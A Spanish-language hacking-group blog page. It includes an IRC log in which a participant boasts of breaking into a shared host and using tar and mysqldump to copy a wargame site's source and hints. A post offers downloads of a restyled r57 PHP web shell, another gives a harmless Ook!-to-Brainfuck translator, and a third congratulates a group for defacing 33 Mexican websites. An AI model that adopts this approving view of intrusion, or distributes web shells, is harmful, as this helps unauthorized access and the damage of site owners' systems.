[21:09] <djrams> para registrarse

[21:10] <MCrow> para atraer mas gente

[21:10] <djrams> eso mismo yo pienso

[21:10] <g30rg3_x> para atraer gente

[21:11] <MCrow> g30rg3_x: voy bien en zero killed?

[21:11] <g30rg3_x> si vas bien

[21:11] <g30rg3_x> de hecho si lees el topico

[21:11] <g30rg3_x> del foro sobre el reto

[21:11] <g30rg3_x> veras que se molesto hades conmigo

[21:12] <MCrow> jaja

[21:13] <MCrow> ok regreso, voy a cenar algo, saludos a todos

[21:14] == MCrow has changed nick to MCrow_no_ta

[21:23] == djrams [i=be2a6699@gateway/web/freenode/x-duwakdqicsgrxgdn] has left ##Yashira.org []

[21:24] <GarraPata> ey que roio tonces ahora tu eres el unico admin george

[21:25] <GarraPata> si se fue el pez tonces,

[21:25] <GarraPata> y los demas que nunca llegue a ver

[21:32] == MCrow_no_ta has changed nick to MCrow

[21:33] <GarraPata> bueno ya me tengo que ir sale

[21:33] == GarraPata [i=bd9890cd@gateway/web/freenode/x-goumztulzemdgnrr] has quit ["Page closed"]

[21:39] <MCrow> programar un interprete de ook :S jaja

[21:39] <MCrow> lo pase a brianfuck y me caga un error el compilador

[21:45] <g30rg3_x> lee el topico

[21:46] <MCrow> http://www.yashira.org/index.php?showtopic=11753 ese?

[21:46] <MCrow> o te refieres a la descripcion del reto?

[21:48] <g30rg3_x> se el del foro

[21:48] <g30rg3_x> Mi compilador generó un Segmentation fault! hehehehehe

[21:49] <g30rg3_x> mejor manejo como Ook, con los retos de hades cambiar un poco es desviarte un mundo

[21:49] <g30rg3_x> **manejalo

[21:50] <MCrow> jeje ok thnx

[22:18] <g30rg3_x> ZzZzZ

[22:21] <MCrow> nuevos bots oficiales de yashira g30rg3_x y el MCrow

[22:22] <MCrow> XD

[22:29] <g30rg3_x> nah, pero tengo un bot

[22:29] <g30rg3_x> se llama Sky

[22:29] <g30rg3_x> no ams que no me obedece

[22:29] <g30rg3_x> xD

[22:31] == elbananero [i=beeaa68a@gateway/web/freenode/x-zwvqewhecwdvabrm] has joined ##Yashira.org

[22:32] == elbananero [i=beeaa68a@gateway/web/freenode/x-zwvqewhecwdvabrm] has left ##Yashira.org []

[22:33] <MCrow> kjajaja

[22:33] <MCrow> ponle los comandos necesarios para ke lustre tus botas XD

[22:46] <g30rg3_x> no se puede su IA, estan compleja

[22:46] <g30rg3_x> que ya no me obedece

[22:46] <MCrow> jaja

[22:50] == GarraPata [i=bd9890cd@gateway/web/freenode/x-hsulygclibilbqsz] has joined ##Yashira.org

[23:06] <MCrow> me di con el zero killed, mejor jugare un rato para despejar la mente jaja, jugar en wow para los retos XD

[23:28] <g30rg3_x> wow sucks

[23:28] <g30rg3_x> xD

[23:30] <MCrow> kjaja

[23:31] <MCrow> see amadres de puntos por un solo reto

[23:32] <g30rg3_x> de wow tengo el source code =)

[23:32] <g30rg3_x> se lo robe al hades xD

[23:33] <MCrow> XD

[23:33] <g30rg3_x> lastima que no se los puedo compartir, de otra forma hades me mataria xD

[23:33] <MCrow> kjajaja

[23:33] <MCrow> es colombiano no?

[23:33] <MCrow> no viajara XD

[23:34] <g30rg3_x> estoy hablando de que iniciarian las holy wars

[23:34] <g30rg3_x> wow vs Yashira

[23:34] <g30rg3_x> xD

[23:34] <MCrow> kjajaja

[23:35] <g30rg3_x> a parte le prometi que no lo haria ;)

[23:35] <MCrow> a vale

[23:36] <GarraPata> como lo conseguiste

[23:37] <g30rg3_x> tercera entrada

[23:38] <MCrow> tercera entrada?

[23:38] <GarraPata> ??

[23:39] <g30rg3_x> wow.sinfocol.org esta(ba) alojado un shared compartido

[23:39] <g30rg3_x> wow sola es segura..

[23:39] <g30rg3_x> pero algun de los x cantidad de sitios del server no..

[23:40] <MCrow> jaja

[23:40] <g30rg3_x> entonces lo que seguia era encontrarlo, de ahi saltar protecciones que incluyen

[23:40] <g30rg3_x> y seguir hasta el path de wow.sinfocol

[23:41] <g30rg3_x> luego un pequeño tar -czf y un mysqldump para completar el backup =P

[23:41] <MCrow> kjaja

[23:41] <MCrow> muy bueno

[23:42] <GarraPata> eso de tar -czf es linux no

[23:42] <GarraPata> no entendi nada pero simon

[23:42] <MCrow> XD

[23:42] <GarraPata> muy bueno ejeje

[23:42] <g30rg3_x> preo bueno lo movio hacia otro hosting..

[23:43] <g30rg3_x> y cuando tome el source, no habian mas de 20 retos xD

[23:43] <g30rg3_x> asi que ya me la pele con estos nuevos xD

[23:44] <MCrow> pero apoco las respuestas no estan encriptadas en una hash?

[23:44] <g30rg3_x> si estan

[23:44] <g30rg3_x> pero las pistas no.

[23:45] <g30rg3_x> y pues tampoco digamos woah que dificil… apenas me faltaban 2.

[23:45] <MCrow> o ya, ke wow cobra por las pistas jeje

[23:46] <g30rg3_x> esta muy bien elaborado wow

[23:46] <MCrow> si, y por lo que se el mismo hades creo todo desde cero

[23:48] <g30rg3_x> mmm no lo creo de 0

[23:48] <g30rg3_x> uso una CMS

[23:49] <MCrow> bueno pero todo lo cabron del code lo desarrollo el

[23:49] <MCrow> es como el pescao se rifo todos los modulos de poca madre pero no hizo IPB

[23:50] <g30rg3_x> mmmmm ni tanto asi

[23:50] <g30rg3_x> lo que hizo pez mas que nada es hacer retos remade

[23:51] <g30rg3_x> una idea que solo era un sueño para los que conocian izhal y la promesa jamas cumplida… izhal v2

[23:51] <g30rg3_x> en su epoca fue el pionero en tener un sistema abierto, mas halla del tipico escalera..

[23:51] <g30rg3_x> que se llevaba en esa epoca..

[23:52] <g30rg3_x> eso mas que ingreso las puntaciones dinamicas

[23:52] <GarraPata> yo no se nada de esas historias ya llegue ruco al internet

[23:52] <g30rg3_x> se encargo de levantar el desmadre de phpnuke de alex

[23:52] <GarraPata> de quien era izhal

[23:52] <g30rg3_x> y pasar de phpBB a IPB

[23:52] <g30rg3_x> izhal era una comunidad de retos hispanos

[23:52] <g30rg3_x> igual de las primeras en su tipo..

[23:53] <g30rg3_x> en si era de asphixia y engaged

[23:53] <MCrow> GarraPata: izhal era de alex

[23:53] <g30rg3_x> neh alex fue participante de izhal

[23:53] <g30rg3_x> de los primeros

[23:53] <MCrow> a cabron jeje

[23:53] <GarraPata> y todos esos vatos que pedo

[23:53] <MCrow> alex la rescato no g30rg3_x ?

[23:54] <g30rg3_x> pues prometieron mucho, hicieron hasta v2.izhal.com

[23:54] <g30rg3_x> foros, etc… (yo estube en los foros ahi peleando contra n00bs, hasta que me sacaron por troll xD)

[23:54] <MCrow> kjaja

[23:54] <g30rg3_x> pero en si no llego nada…

[23:54] <g30rg3_x> y los admins principales..

[23:55] <g30rg3_x> pues engaged desaparecio de la scene

[23:55] <g30rg3_x> asphixia se fue a vivir/trabajar a china

[23:55] <g30rg3_x> vikt0ry esta trabajando para el departamento de defensa de españa (o algo asi)

[23:55] <g30rg3_x> asi como todo los demas se fueron dispersando

[23:56] <g30rg3_x> en fin, se murio izhal un dia

[23:56] <GarraPata> no mames me perdi de mucho

[23:56] <g30rg3_x> y ya punto… fin.

[23:56] <MCrow> jaja

[23:56] <g30rg3_x> ahora contestando a mcrow por que alex tiene un correo izhal

[23:56] <g30rg3_x> cuando se llegaba al rango mas alto: comandante

[23:56] <MCrow> yo ya no llegue a izhal, ya llegue cuando era yashira, en la segunda alta, cuando dreamhost jodio las bolas del pez

[23:57] <g30rg3_x> (ya que lo especial de esta comunidad es que se te daban rangos militares al subir)

[23:57] <g30rg3_x> el premio era una cuenta de izhal

[23:57] <MCrow> :O

[23:57] <g30rg3_x> y accesos al canal irc para patear gente ec..

[23:57] <g30rg3_x> cuando yo termine el torneo y las pide, decian que ya no daban etc..

[23:58] <g30rg3_x> asi que me jodi, asi como pez que termine unos meses despues que yo..

[23:58] <g30rg3_x> alex fue de los primeros, lo paso creo que 2 años o 1 antes que nosotros

[00:00] <MCrow> jeje a ke oscurito, les gano xk empezo antes o porque era mas cabron?

[00:02] == MCrow_ [i=c9725885@gateway/web/freenode/x-trscxityeyufedrp] has joined ##Yashira.org

[00:02] -ChanServ- [##Yashira.org] Bienvenido al Canal Oficial del WarGame Yashira

[00:03] == MCrow [i=c9725885@gateway/web/freenode/x-bsrboohjuazwxaun] has quit [Ping timeout: 180 seconds]

[00:03] <MCrow_> perdon aprete por equivocacion un puto link

[00:03] <g30rg3_x> no creo retirarme de ella

[00:03] <GarraPata> donde jalas

[00:03] <GarraPata> creo que eres del sur no

[00:03] == MCrow_ has changed nick to MCrow

[00:03] <GarraPata> aya por yucatan

[00:04] <g30rg3_x> explica “jalas”

[00:04] <g30rg3_x> este es el ranking mas antiguo de izhal que encuentro

[00:04] <g30rg3_x> http://web.archive.org/web/20040402071054/http://www.izhal.com/hof/com.htm

[00:04] <g30rg3_x> alex lo acabo

[00:04] <g30rg3_x> – la_base (Viernes 04 de Julio de 2003 a las 04:47:41 PM).

[00:05] <MCrow> – crackneo (Viernes 05 de Marzo de 2004 a las 09:29:28 PM).

[00:05] <MCrow> – george_x (Jueves 18 de Marzo de 2004 a las 02:34:08 PM).

[00:05] <g30rg3_x> george_x (Jueves 18 de Marzo de 2004 a las 02:34:08 PM).

[00:05] <g30rg3_x> se

[00:06] <MCrow> y el puto pez?

[00:06] <g30rg3_x> mismo año mas tade

[00:06] <g30rg3_x> pero archive.org no guarda mas

[00:06] <MCrow> a ya

[00:06] <g30rg3_x> http://web.archive.org/web/*/http://www.izhal.com/hof/com.htm

[00:08] <MCrow> la mayoria de los nicks me son desconocidos

[00:08] <MCrow> – tecdata (Martes 27 de Agosto de 2002 a las 10:03:26 PM). ese tio me suena

[00:08] <g30rg3_x> es el de hackerss

[00:08] <g30rg3_x> el tec

[00:09] <GarraPata> yo solo he visto los nicks de romansoft y androm

[00:09] <GarraPata> en otras partes

[00:09] <MCrow> si a mi casi no me suena ninguno

[00:09] <MCrow> esos si son de la vieja escuela

[00:10] <g30rg3_x> son antiguos, muchos de ellos siguen

[00:10] <g30rg3_x> mandingo sigue… yoire.com

[00:10] <g30rg3_x> romansoft igual… rs-labs.com

[00:10] <g30rg3_x> androm, aparece y desaparece en Yashira

[00:11] <g30rg3_x> y asi hay varios, por ejemplo probando123 es backtracker

[00:11] <g30rg3_x> e hizo su torneo

[00:11] <g30rg3_x> seguridadinformatica.org

[00:12] <g30rg3_x> pero bueno historial paralelas a izhal

[00:12] <g30rg3_x> boinasnegras.com

[00:12] <g30rg3_x> famoso por que habia mucho “encargado de seguridad de españa” en el torneo

[00:12] <g30rg3_x> y por que la cosa estaba dura

[00:12] <g30rg3_x> los 2 torneos realizados los gano mandingo.

[00:13] <g30rg3_x> el tercero, nunca se termino

[00:13] <g30rg3_x> pero decian que lo abian ganado mandingo

[00:13] <MCrow> veras que de esa encuesta solo conosco a izhal xk sabia ke el alex pertenecia a esa comunidad

, ,

Dec/09

2

#n3ur0n4′5 r57 shell

0 Comments | Posted by @135747 in Codex, PHP, hack

sin tener nada que hacer comencé a modificar el estilo de la php r57 shell para adaptarlo al puro estilo de n3ur0n4 c0rp les dejo un screen de la apariencia final, la he provado y es funcional a menos que el estilo de tanto cambiar por aquí y por allá se haya alterado el código esencial, si pasa lo segundo favor de hacérmelo saber :D

  1. r57 n3ur0n4 shell.rar <– r57 shell modificada estilo n3ur0n4
  2. shell r57.rar <– Shell Original
r57-shell

, , , , , , , ,

Nov/09

23

Traductor Ook! a Brainfuck by z3r0.und3r

0 Comments | Posted by @135747 in Codex, PHP, scripts

Tratando de resolver el reto de yashira llamado Nº195 – Zero Zero Killed! y buscando un interprete de lenguaje Ook! funcional, me tope con la triste realidad de no encontrar nada, quizás busque mal, después de un rato me baje un interprete de brainfuck otro lenguaje esotérico.

después de codear un instante, me logre este traductor funcional de Ook! a brainfuck, cuya traducción es interpretada a la perfección el compilador brianfuck_machine que esta en la sección de XFiles en esta pagina. sin mas les dejo el código del php que he creado. esperando les sea útil el aporte…

Saludos n3ur0n1705…
Lestat de Lioncourt

PD: Aca les dejo el code ya en funcionamiento: http://n3ur0n4.byethost9.com/ook_to_bf.php

Traductor Ook! a Brainfuck:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
 
<div align="center">

<?

if ($_POST[f]!=NULL){
	$ook=$_POST[f];
	for ($x=0;$x<strlen($ook);$x++){
		$as=ord(substr($ook,$x,1));
		if ($as!=13) {
			$_ook=$_ook.chr($as);
		}
	}	

	echo "Conversor Ook! to Brainfuck By Lestat de Lioncourt<br>#n3ur0n4.org<br><br>Ook! Codex:<form action=\"\" method=\"POST\">
		<textarea name=\"f\" style=\"width:495px; height:250px; scroll:auto;\">".$_ook."</textarea>
		<br><input type=\"submit\" value=\"send\">
	      </form><br><br>";

	echo "Brainfuck codex:<form action=\"\">
		<textarea name=\"x\" style=\"width:495px; height:250px; scroll:auto;\">";

	$x=0;
	while ($x<strlen($_ook)){
		if (substr($_ook,$x,9)=="Ook. Ook?"){
			echo ">";
		} else if (substr($_ook,$x,9)=="Ook? Ook."){
			echo "<";
		} else if (substr($_ook,$x,9)=="Ook. Ook."){
			echo "+";
		} else if (substr($_ook,$x,9)=="Ook! Ook!"){
			echo "-";
		} else if (substr($_ook,$x,9)=="Ook! Ook."){
			echo ".";
		} else if (substr($_ook,$x,9)=="Ook. Ook!"){
			echo ",";
		} else if (substr($_ook,$x,9)=="Ook! Ook?"){
			echo "[";
		} else if (substr($_ook,$x,9)=="Ook? Ook!"){
			echo "]";
		}
		$x+=10;
	}
	echo "</textarea>
	      </form>";
} else {
	echo "Conversor Ook! to Brainfuck By Lestat de Lioncourt<br>#n3ur0n4.org<br><br>Ook! Codex:<form action=\"\" method=\"POST\">
		<textarea name=\"f\" style=\"width:495px; height:250px; scroll:auto;\"></textarea>
		<br><input type=\"submit\" value=\"send\">
	</form>";
}
?>

</div>

, , , , , ,

Nov/09

16

Ciber Protesta Mexicana: Hackean 33 webs en México

4 Comments | Posted by @135747 in Mis Noticias, México, hack

Hoy 16 de noviembre me encuentro con la noticia del hackeo masivo de la siguiente lista de webs, a cargo de CPM un grupo de desfacers que ya empezaron su ciberprotesta contra este gobierno que oprime a todo el pueblo, haciendo a los pobres aun mas y a los ricos aun más ricos, me gustaría un país socialista pero sin embargo los que tenemos la culpa somos el propio pueblo mexicano que deja que el gobierno haga lo que desee con nuestro impuestos.

Una felicitación a CPM por sus ataques y no es que lo apruebe del todo sin embargo lo creo necesario ya si no acuden a nuestras propuestas como pueblo a base de marchas por que no a base de ataques a sus sistemas, le pregunto a esos políticos, creen que con su propuesta de mas impuestos y aun mas de atacar las telecom que es donde estas cibersociedades surgen y se desenvuelven, creen que no iban a tener una respuesta?

No mas impunidad en este país, necesitamos criminólogos que no solo busquen a ver quien se la paga, a ver quien presentan ante la sociedad y listo.

Aun mas son las protestas de la cibersociedad mexicana en este desface, todos tienen algo que expresar.

El hilo de las protestas esta en http://informaticaxd.com.ar/prot/all.php todos propongan algo…

Lista de páginas hackeadas:

, , , ,

Older posts >>

n3ur0n4

#n3ur0n4 Corporation
Live Free & Die Free
To top